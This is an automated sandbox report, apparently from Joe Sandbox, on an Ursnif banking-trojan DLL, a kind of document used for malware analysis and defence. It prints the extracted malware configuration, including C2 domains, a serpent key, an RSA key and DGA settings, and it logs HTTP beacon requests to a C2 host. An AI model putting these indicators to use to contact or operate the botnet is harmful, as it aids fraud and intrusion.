Play interactive tour

Edit tour

Windows Analysis Report 2e.dll

Overview

General Information

Sample Name:	2e.dll
Analysis ID:	498882
MD5:	92a0f1023e064a46fbf2e6bb697edf55
SHA1:	d2d28a35de82e8161266355a351a1e5822d49303
SHA256:	2e012edb93bb99de397b629cdc44d7516f9e6f47cd7106c93d2d6fd66a37af87
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for domain / URL

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Tries to load missing DLLs

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Queries the installation date of Windows

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

PE / OLE file has an invalid certificate

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 796 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2e.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 5236 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4872 cmdline: rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 6632 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5044 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "aHj/FBAOlIGEKeY7hJtySGbhiJ+OuJag0uZwD+z98lrXzI6cghioivt/zNqE6myavQkK1TvPguLqYjDl5wY423TG5cujR5I12+riFLmXU6yLpvCwEpgEflmuQBdLI5UmZ7PM966PLmgcotslJ9y1/jYsiD2WoJkIZSAKBnncJmMF7h9eqsKMXazDFT0yQ2hN", "c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "1100", "server": "730", "serpent_key": "R13xH4JuHdOWL6Sg", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 796	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 4872	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.e00000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.30e0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.e00000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.2f90000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.10000000.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.2f40000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.4ce94a0.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.31494a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.30e0000.2.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.2f90000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.d60000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.10000000.4.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.fa0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.10000000.4.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.31494a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.4ce94a0.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.d60000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.10000000.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 2e.dll

Avira: detected

Found malware configuration

Show sources

Source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "aHj/FBAOlIGEKeY7hJtySGbhiJ+OuJag0uZwD+z98lrXzI6cghioivt/zNqE6myavQkK1TvPguLqYjDl5wY423TG5cujR5I12+riFLmXU6yLpvCwEpgEflmuQBdLI5UmZ7PM966PLmgcotslJ9y1/jYsiD2WoJkIZSAKBnncJmMF7h9eqsKMXazDFT0yQ2hN", "c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"], "botnet": "1100", "server": "730", "serpent_key": "R13xH4JuHdOWL6Sg", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: 2e.dll	Virustotal: Detection: 65%	Perma Link
Source: 2e.dll	Metadefender: Detection: 40%	Perma Link
Source: 2e.dll	ReversingLabs: Detection: 82%

Multi AV Scanner detection for domain / URL

Show sources

Source: api10.laptok.at

Virustotal: Detection: 14%

Perma Link

Source: 2.2.rundll32.exe.30e0000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.e00000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.rundll32.exe.10000000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: 2e.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA7DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49792 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49792 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49824 -> 87.106.18.141:80

Source: Joe Sandbox View

ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: Joe Sandbox View	IP Address: 87.106.18.141 87.106.18.141
Source: Joe Sandbox View	IP Address: 87.106.18.141 87.106.18.141

Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	String found in binary or memory: http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P
Source: {DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat.21.dr, ~DFB9EDA9C4DE41A518.TMP.21.dr	String found in binary or memory: http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a
Source: {C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat.15.dr	String found in binary or memory: http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX
Source: 2e.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 2e.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 2e.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.15.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.15.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.15.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.15.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.15.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.15.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.15.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.15.dr	String found in binary or memory: http://www.youtube.com/
Source: 2e.dll	String found in binary or memory: https://sectigo.com/CPS0D

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: global traffic	HTTP traffic detected: GET /api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 2e.dll

